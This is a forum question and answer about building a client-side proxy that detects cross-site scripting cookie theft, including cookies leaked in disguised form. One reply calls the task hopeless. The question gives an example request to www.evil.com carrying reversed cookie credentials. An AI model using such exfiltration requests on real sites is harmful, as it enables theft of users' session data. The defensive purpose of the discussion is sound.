Reputation: 243
Cross-site scripting - Cookie encryption
I am developing a client-side proxy to counter Cross-site scripting attacks. All the requests from the browser will go through the proxy. I am able to classify the requests as local or cross-domain, using the Referer header and other things. But, I need to reduce the number of false positives.
For this, I will track the cookie sent from the web-server in a response and I will look for parts of this cookie in any cross-domain request, i.e., I will check for only the cross-site requests that carry sensitive information (cookie).
But this simple idea simply fails if the attacker constructs a HTTP response where cookie is encrypted and leaked.
For example,
cookie :
user=rahim;pass=asdf
The hacker constructs a request
www.evil.com?name=mihar&pass=fdsa
The attacker has simply reversed the cookie parameters. There are such innumerable number of ways the attacker can play with the cookie and fool the process.
I need an algorithm which checks just that. The cookie parameters should not be allowed to pass through in whatever form.
Upvotes: 0
Views: 413
Answers (1)
Reputation: 1788
your task is hopeless. There is no way to tell what the true meaning of a cookie is.
Upvotes: 1
Related Questions
- JavaScript and third party cookies
- Could this XSS protection with HttpOnly Cookies work?
- Protection against Cross site scripting on specific JSP and Servlet code
- Allow Javascript - protect against XSS? (unique scenario)
- What is the best and easiest way to secure cookies
- Using Javascript cookies in Java
- cookie encryption
- Cross domain cookie with script tag?
- JS |Xss defence question
- Java Web App Security using Cookies